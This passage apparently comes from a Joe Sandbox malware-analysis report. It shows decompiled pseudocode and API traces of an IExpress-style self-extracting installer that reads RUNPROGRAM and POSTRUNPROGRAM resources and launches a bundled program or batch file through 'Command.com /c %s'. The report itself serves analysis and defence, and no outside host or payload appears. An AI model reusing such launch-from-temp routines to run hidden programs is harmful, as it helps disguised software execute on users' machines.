                                                                                                                                                                                                          												goto L58;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags =  *0x869a40 - 1; // 0x3
                                                                                                                                                                                                          										if(__eflags == 0) {
                                                                                                                                                                                                          											goto L37;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags =  *0x868a20;
                                                                                                                                                                                                          										if( *0x868a20 == 0) {
                                                                                                                                                                                                          											goto L37;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags = _t157;
                                                                                                                                                                                                          										if(_t157 != 0) {
                                                                                                                                                                                                          											goto L38;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_v388 = 1;
                                                                                                                                                                                                          										E0086202A(_t146); // executed
                                                                                                                                                                                                          										goto L37;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t146 =  &_v280;
                                                                                                                                                                                                          									_t108 = E0086468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                          									__eflags = _t108;
                                                                                                                                                                                                          									if(_t108 == 0) {
                                                                                                                                                                                                          										goto L25;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags =  *0x868c42;
                                                                                                                                                                                                          									if( *0x868c42 != 0) {
                                                                                                                                                                                                          										goto L69;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                          									__eflags = _t112 == 0;
                                                                                                                                                                                                          									if(_t112 == 0) {
                                                                                                                                                                                                          										goto L69;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L31;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t118 =  *0x868a38; // 0x0
                                                                                                                                                                                                          								if(_t118 == 0) {
                                                                                                                                                                                                          									L23:
                                                                                                                                                                                                          									if(_t153 != 0) {
                                                                                                                                                                                                          										goto L31;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t146 =  &_v276;
                                                                                                                                                                                                          									if(E0086468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                          										goto L27;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L25;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                          									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                          									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                          										goto L62;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t140 = "USRQCMD";
                                                                                                                                                                                                          									L20:
                                                                                                                                                                                                          									_t146 =  &_v276;
                                                                                                                                                                                                          									if(E0086468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                          										goto L25;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                          										_t153 = 1;
                                                                                                                                                                                                          										_v388 = 1;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L23;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t140 = "ADMQCMD";
                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L26:
                                                                                                                                                                                                          						_push(_t130);
                                                                                                                                                                                                          						_t146 = 0x104;
                                                                                                                                                                                                          						E00861781( &_v276, 0x104, _t130, 0x868c42);
                                                                                                                                                                                                          						goto L27;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t130 = "REBOOT";
                                                                                                                                                                                                          				_t125 = E0086468F(_t130, 0x869a2c, 4);
                                                                                                                                                                                                          				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                          					goto L25;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





























































                                                                                                                                                                                                          0x00863baa
                                                                                                                                                                                                          0x00863bb0
                                                                                                                                                                                                          0x00863bb7
                                                                                                                                                                                                          0x00863bc0
                                                                                                                                                                                                          0x00863bc2
                                                                                                                                                                                                          0x00863bc9
                                                                                                                                                                                                          0x00863bcb
                                                                                                                                                                                                          0x00863bcf
                                                                                                                                                                                                          0x00863bd3
                                                                                                                                                                                                          0x00863bd9
                                                                                                                                                                                                          0x00863bfd
                                                                                                                                                                                                          0x00863bfd
                                                                                                                                                                                                          0x00863bff
                                                                                                                                                                                                          0x00863c03
                                                                                                                                                                                                          0x00863c03
                                                                                                                                                                                                          0x00863c11
                                                                                                                                                                                                          0x00863c16
                                                                                                                                                                                                          0x00863c19
                                                                                                                                                                                                          0x00863c28
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863c30
                                                                                                                                                                                                          0x00863c39
                                                                                                                                                                                                          0x00863c40
                                                                                                                                                                                                          0x00863d13
                                                                                                                                                                                                          0x00863d15
                                                                                                                                                                                                          0x00863d21
                                                                                                                                                                                                          0x00863d26
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863c4f
                                                                                                                                                                                                          0x00863c56
                                                                                                                                                                                                          0x00863c60
                                                                                                                                                                                                          0x00863c65
                                                                                                                                                                                                          0x00863c77
                                                                                                                                                                                                          0x00863c78
                                                                                                                                                                                                          0x00863c7c
                                                                                                                                                                                                          0x00863c7e
                                                                                                                                                                                                          0x00863c82
                                                                                                                                                                                                          0x00863c82
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863c7c
                                                                                                                                                                                                          0x00863c67
                                                                                                                                                                                                          0x00863c69
                                                                                                                                                                                                          0x00863c6d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863c58
                                                                                                                                                                                                          0x00863c58
                                                                                                                                                                                                          0x00863c6e
                                                                                                                                                                                                          0x00863c6e
                                                                                                                                                                                                          0x00863c87
                                                                                                                                                                                                          0x00863c89
                                                                                                                                                                                                          0x00863d4d
                                                                                                                                                                                                          0x00863d4f
                                                                                                                                                                                                          0x00863d50
                                                                                                                                                                                                          0x00863d52
                                                                                                                                                                                                          0x00863d9e
                                                                                                                                                                                                          0x00863da8
                                                                                                                                                                                                          0x00863daf
                                                                                                                                                                                                          0x00863db4
                                                                                                                                                                                                          0x00863db6
                                                                                                                                                                                                          0x00863f4d
                                                                                                                                                                                                          0x00863f4d
                                                                                                                                                                                                          0x00863f4f
                                                                                                                                                                                                          0x00863f56
                                                                                                                                                                                                          0x00863f57
                                                                                                                                                                                                          0x00863f58
                                                                                                                                                                                                          0x00863f63
                                                                                                                                                                                                          0x00863f63
                                                                                                                                                                                                          0x00863dbc
                                                                                                                                                                                                          0x00863dc0
                                                                                                                                                                                                          0x00863dc2
                                                                                                                                                                                                          0x00863de6
                                                                                                                                                                                                          0x00863de6
                                                                                                                                                                                                          0x00863de8
                                                                                                                                                                                                          0x00863f0b
                                                                                                                                                                                                          0x00863f0b
                                                                                                                                                                                                          0x00863f0f
                                                                                                                                                                                                          0x00863f13
                                                                                                                                                                                                          0x00863f15
                                                                                                                                                                                                          0x00863f1a
                                                                                                                                                                                                          0x00863f1c
                                                                                                                                                                                                          0x00863f46
                                                                                                                                                                                                          0x00863f47
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863f47
                                                                                                                                                                                                          0x00863f1e
                                                                                                                                                                                                          0x00863f1f
                                                                                                                                                                                                          0x00863f25
                                                                                                                                                                                                          0x00863f26
                                                                                                                                                                                                          0x00863f2a
                                                                                                                                                                                                          0x00863f2d
                                                                                                                                                                                                          0x00863fd9
                                                                                                                                                                                                          0x00863fd9
                                                                                                                                                                                                          0x00863fda
                                                                                                                                                                                                          0x00863fda
                                                                                                                                                                                                          0x00863fe1
                                                                                                                                                                                                          0x00863fe3
                                                                                                                                                                                                          0x00863fe3
                                                                                                                                                                                                          0x00863fe8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863fe8
                                                                                                                                                                                                          0x00863f33
                                                                                                                                                                                                          0x00863f37
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863f37
                                                                                                                                                                                                          0x00863dee
                                                                                                                                                                                                          0x00863dee
                                                                                                                                                                                                          0x00863df5
                                                                                                                                                                                                          0x00863fad
                                                                                                                                                                                                          0x00863fb9
                                                                                                                                                                                                          0x00863fc2
                                                                                                                                                                                                          0x00863fc8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863fc8
                                                                                                                                                                                                          0x00863dfb
                                                                                                                                                                                                          0x00863dfd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863e03
                                                                                                                                                                                                          0x00863e0a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863e15
                                                                                                                                                                                                          0x00863e17
                                                                                                                                                                                                          0x00863e19
                                                                                                                                                                                                          0x00863f94
                                                                                                                                                                                                          0x00863fa4
                                                                                                                                                                                                          0x00863f7c
                                                                                                                                                                                                          0x00863f80
                                                                                                                                                                                                          0x00863f8b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863f8b
                                                                                                                                                                                                          0x00863e2c
                                                                                                                                                                                                          0x00863e30
                                                                                                                                                                                                          0x00863e34
                                                                                                                                                                                                          0x00863e36
                                                                                                                                                                                                          0x00863f69
                                                                                                                                                                                                          0x00863f6e
                                                                                                                                                                                                          0x00863f70
                                                                                                                                                                                                          0x00863f76
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863f76
                                                                                                                                                                                                          0x00863e3c
                                                                                                                                                                                                          0x00863e43
                                                                                                                                                                                                          0x00863e47
                                                                                                                                                                                                          0x00863e52
                                                                                                                                                                                                          0x00863e56
                                                                                                                                                                                                          0x00863e5c
                                                                                                                                                                                                          0x00863e61
                                                                                                                                                                                                          0x00863e68
                                                                                                                                                                                                          0x00863e70
                                                                                                                                                                                                          0x00863e74
                                                                                                                                                                                                          0x00863e7c
                                                                                                                                                                                                          0x00863e80
                                                                                                                                                                                                          0x00863e82
                                                                                                                                                                                                          0x00863e82
                                                                                                                                                                                                          0x00863e87
                                                                                                                                                                                                          0x00863e87
                                                                                                                                                                                                          0x00863e8b
                                                                                                                                                                                                          0x00863e91
                                                                                                                                                                                                          0x00863e94
                                                                                                                                                                                                          0x00863e96
                                                                                                                                                                                                          0x00863e96
                                                                                                                                                                                                          0x00863e9b
                                                                                                                                                                                                          0x00863e9b
                                                                                                                                                                                                          0x00863e9f
                                                                                                                                                                                                          0x00863ea2
                                                                                                                                                                                                          0x00863ea4
                                                                                                                                                                                                          0x00863ea4
                                                                                                                                                                                                          0x00863ea9
                                                                                                                                                                                                          0x00863ea9
                                                                                                                                                                                                          0x00863ead
                                                                                                                                                                                                          0x00863eb3
                                                                                                                                                                                                          0x00863eb6
                                                                                                                                                                                                          0x00863eb8
                                                                                                                                                                                                          0x00863eb8
                                                                                                                                                                                                          0x00863ebd
                                                                                                                                                                                                          0x00863ebd
                                                                                                                                                                                                          0x00863ec1
                                                                                                                                                                                                          0x00863ec3
                                                                                                                                                                                                          0x00863ec5
                                                                                                                                                                                                          0x00863ec5
                                                                                                                                                                                                          0x00863eca
                                                                                                                                                                                                          0x00863eca
                                                                                                                                                                                                          0x00863ece
                                                                                                                                                                                                          0x00863ed5
                                                                                                                                                                                                          0x00863ed9
                                                                                                                                                                                                          0x00863ee0
                                                                                                                                                                                                          0x00863ee6
                                                                                                                                                                                                          0x00863eea
                                                                                                                                                                                                          0x00863eec
                                                                                                                                                                                                          0x00863eee
                                                                                                                                                                                                          0x00863ef3
                                                                                                                                                                                                          0x00863ef3
                                                                                                                                                                                                          0x00863ef5
                                                                                                                                                                                                          0x00863efa
                                                                                                                                                                                                          0x00863efb
                                                                                                                                                                                                          0x00863efd
                                                                                                                                                                                                          0x00863f40
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863eff
                                                                                                                                                                                                          0x00863eff
                                                                                                                                                                                                          0x00863f05
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863f05
                                                                                                                                                                                                          0x00863efd
                                                                                                                                                                                                          0x00863dc7
                                                                                                                                                                                                          0x00863dce
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863dd0
                                                                                                                                                                                                          0x00863dd7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863dd9
                                                                                                                                                                                                          0x00863ddb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863ddd
                                                                                                                                                                                                          0x00863de1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863de1
                                                                                                                                                                                                          0x00863d59
                                                                                                                                                                                                          0x00863d65
                                                                                                                                                                                                          0x00863d6a
                                                                                                                                                                                                          0x00863d6c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863d6e
                                                                                                                                                                                                          0x00863d75
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863d8f
                                                                                                                                                                                                          0x00863d96
                                                                                                                                                                                                          0x00863d98
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863d98
                                                                                                                                                                                                          0x00863c8f
                                                                                                                                                                                                          0x00863c98
                                                                                                                                                                                                          0x00863cf1
                                                                                                                                                                                                          0x00863cf3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863cfe
                                                                                                                                                                                                          0x00863d11
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863d11
                                                                                                                                                                                                          0x00863c9c
                                                                                                                                                                                                          0x00863ca5
                                                                                                                                                                                                          0x00863ca7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863cad
                                                                                                                                                                                                          0x00863cb2
                                                                                                                                                                                                          0x00863cb7
                                                                                                                                                                                                          0x00863cc5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863ce8
                                                                                                                                                                                                          0x00863cec
                                                                                                                                                                                                          0x00863ced
                                                                                                                                                                                                          0x00863ced
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863ce8
                                                                                                                                                                                                          0x00863c9e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863c9e
                                                                                                                                                                                                          0x00863c56
                                                                                                                                                                                                          0x00863d35
                                                                                                                                                                                                          0x00863d35
                                                                                                                                                                                                          0x00863d3c
                                                                                                                                                                                                          0x00863d48
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863d48
                                                                                                                                                                                                          0x00863c03
                                                                                                                                                                                                          0x00863be2
                                                                                                                                                                                                          0x00863be7
                                                                                                                                                                                                          0x00863bee
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00863C11
                                                                                                                                                                                                          • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00863CDC
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                            • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                            • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                            • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                            • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                            • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00868C42), ref: 00863D8F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00863E26
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00868C42), ref: 00863EFF
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00868C42), ref: 00863F1F
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00868C42), ref: 00863F40
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00868C42), ref: 00863F47
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00868C42), ref: 00863F76
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00868C42), ref: 00863F80
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00868C42), ref: 00863FC2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                          • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$herso
                                                                                                                                                                                                          • API String ID: 1032054927-1713645849
                                                                                                                                                                                                          • Opcode ID: bf7410f108ad1079c40bed06c79c6cacefe19665576380e4cbc97e072c123271
                                                                                                                                                                                                          • Instruction ID: 5973996fd7dbd8b16f0855937ebcec10fac5873edf527ea4f6c19d80c9cc76f0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf7410f108ad1079c40bed06c79c6cacefe19665576380e4cbc97e072c123271
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80B1F270908301DBD720DF68D845B6B76E8FB85700F131A2DFA95E62D1EBB5CA44CB92
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 141 861ae8-861b2c call 861680 144 861b2e-861b39 141->144 145 861b3b-861b40 141->145 146 861b46-861b61 call 861a84 144->146 145->146 149 861b63-861b65 146->149 150 861b9f-861bc2 call 861781 call 86658a 146->150 151 861b68-861b6d 149->151 159 861bc7-861bd3 call 8666c8 150->159 151->151 153 861b6f-861b74 151->153 153->150 155 861b76-861b7b 153->155 157 861b83-861b86 155->157 158 861b7d-861b81 155->158 157->150 162 861b88-861b8a 157->162 158->157 161 861b8c-861b9d call 861680 158->161 165 861d73-861d7f call 8666c8 159->165 166 861bd9-861bf1 CompareStringA 159->166 161->159 162->150 162->161 175 861d81-861d99 CompareStringA 165->175 176 861df8-861e09 LocalAlloc 165->176 166->165 168 861bf7-861c07 GetFileAttributesA 166->168 170 861d53-861d5e 168->170 171 861c0d-861c15 168->171 173 861d64-861d6e call 8644b9 170->173 171->170 174 861c1b-861c33 call 861a84 171->174 187 861e94-861ea4 call 866ce0 173->187 189 861c35-861c38 174->189 190 861c50-861c61 LocalAlloc 174->190 175->176 181 861d9b-861da2 175->181 178 861dd4-861ddf 176->178 179 861e0b-861e1b GetFileAttributesA 176->179 178->173 183 861e67-861e73 call 861680 179->183 184 861e1d-861e1f 179->184 186 861da5-861daa 181->186 199 861e78-861e84 call 862aac 183->199 184->183 188 861e21-861e3e call 861781 184->188 186->186 191 861dac-861db4 186->191 188->199 210 861e40-861e43 188->210 195 861c40-861c4b call 861a84 189->195 196 861c3a 189->196 190->178 198 861c67-861c72 190->198 197 861db7-861dbc 191->197 195->190 196->195 197->197 203 861dbe-861dd2 LocalAlloc 197->203 204 861c74 198->204 205 861c79-861cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->205 209 861e89-861e92 199->209 203->178 211 861de1-861df3 call 86171e 203->211 204->205 207 861cc2-861ccc 205->207 208 861cf8-861d07 205->208 212 861cd3-861cf3 call 861680 * 2 207->212 213 861cce 207->213 215 861d23 208->215 216 861d09-861d21 GetShortPathNameA 208->216 209->187 210->199 214 861e45-861e65 call 8616b3 * 2 210->214 211->209 212->209 213->212 214->199 220 861d28-861d2b 215->220 216->220 224 861d32-861d4e call 86171e 220->224 225 861d2d 220->225 224->209 225->224
                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                          			E00861AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				char _v527;
                                                                                                                                                                                                          				char _v528;
                                                                                                                                                                                                          				char _v1552;
                                                                                                                                                                                                          				CHAR* _v1556;
                                                                                                                                                                                                          				int* _v1560;
                                                                                                                                                                                                          				CHAR** _v1564;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                          				CHAR* _t53;
                                                                                                                                                                                                          				CHAR* _t54;
                                                                                                                                                                                                          				char* _t57;
                                                                                                                                                                                                          				char* _t58;
                                                                                                                                                                                                          				CHAR* _t60;
                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                          				signed char _t65;
                                                                                                                                                                                                          				intOrPtr _t76;
                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                          				unsigned int _t85;
                                                                                                                                                                                                          				CHAR* _t90;
                                                                                                                                                                                                          				CHAR* _t92;
                                                                                                                                                                                                          				char _t105;
                                                                                                                                                                                                          				char _t106;
                                                                                                                                                                                                          				CHAR** _t111;
                                                                                                                                                                                                          				CHAR* _t115;
                                                                                                                                                                                                          				intOrPtr* _t125;
                                                                                                                                                                                                          				void* _t126;
                                                                                                                                                                                                          				CHAR* _t132;
                                                                                                                                                                                                          				CHAR* _t135;
                                                                                                                                                                                                          				void* _t138;
                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                          				void* _t145;
                                                                                                                                                                                                          				intOrPtr* _t146;
                                                                                                                                                                                                          				char* _t148;
                                                                                                                                                                                                          				CHAR* _t151;
                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                          				CHAR* _t155;
                                                                                                                                                                                                          				CHAR* _t156;
                                                                                                                                                                                                          				void* _t157;
                                                                                                                                                                                                          				signed int _t158;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t48 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                          				_t108 = __ecx;
                                                                                                                                                                                                          				_v1564 = _a4;
                                                                                                                                                                                                          				_v1560 = _a8;
                                                                                                                                                                                                          				E00861680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                          				if(_v528 != 0x22) {
                                                                                                                                                                                                          					_t135 = " ";
                                                                                                                                                                                                          					_t53 =  &_v528;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t135 = "\"";
                                                                                                                                                                                                          					_t53 =  &_v527;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t111 =  &_v1556;
                                                                                                                                                                                                          				_v1556 = _t53;
                                                                                                                                                                                                          				_t54 = E00861A84(_t111, _t135);
                                                                                                                                                                                                          				_t156 = _v1556;
                                                                                                                                                                                                          				_t151 = _t54;
                                                                                                                                                                                                          				if(_t156 == 0) {
                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                          					_push(_t111);
                                                                                                                                                                                                          					E00861781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                          					E0086658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t132 = _t156;
                                                                                                                                                                                                          					_t148 =  &(_t132[1]);
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						_t105 =  *_t132;
                                                                                                                                                                                                          						_t132 =  &(_t132[1]);
                                                                                                                                                                                                          					} while (_t105 != 0);
                                                                                                                                                                                                          					_t111 = _t132 - _t148;
                                                                                                                                                                                                          					if(_t111 < 3) {
                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t106 = _t156[1];
                                                                                                                                                                                                          					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                          						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                          							goto L12;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							goto L11;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                          						E00861680( &_v268, 0x104, _t156);
                                                                                                                                                                                                          						L13:
                                                                                                                                                                                                          						_t138 = 0x2e;
                                                                                                                                                                                                          						_t57 = E008666C8(_t156, _t138);
                                                                                                                                                                                                          						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                          							_t139 = 0x2e;
                                                                                                                                                                                                          							_t115 = _t156;
                                                                                                                                                                                                          							_t58 = E008666C8(_t115, _t139);
                                                                                                                                                                                                          							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                          								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                          								if(_t156 == 0) {
                                                                                                                                                                                                          									goto L43;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                          								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                          									E00861680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_push(_t115);
                                                                                                                                                                                                          									_t108 = 0x400;
                                                                                                                                                                                                          									E00861781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                          									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                          										E008616B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                          										E008616B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t140 = _t156;
                                                                                                                                                                                                          								 *_t156 = 0;
                                                                                                                                                                                                          								E00862AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                          								goto L53;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t108 = "Command.com /c %s";
                                                                                                                                                                                                          								_t125 = "Command.com /c %s";
                                                                                                                                                                                                          								_t145 = _t125 + 1;
                                                                                                                                                                                                          								do {
                                                                                                                                                                                                          									_t76 =  *_t125;
                                                                                                                                                                                                          									_t125 = _t125 + 1;
                                                                                                                                                                                                          								} while (_t76 != 0);
                                                                                                                                                                                                          								_t126 = _t125 - _t145;
                                                                                                                                                                                                          								_t146 =  &_v268;
                                                                                                                                                                                                          								_t157 = _t146 + 1;
                                                                                                                                                                                                          								do {
                                                                                                                                                                                                          									_t77 =  *_t146;
                                                                                                                                                                                                          									_t146 = _t146 + 1;
                                                                                                                                                                                                          								} while (_t77 != 0);
                                                                                                                                                                                                          								_t140 = _t146 - _t157;
                                                                                                                                                                                                          								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                          								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                          								if(_t156 != 0) {
                                                                                                                                                                                                          									E0086171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                          									goto L53;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L43;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t85 = GetFileAttributesA( &_v268);
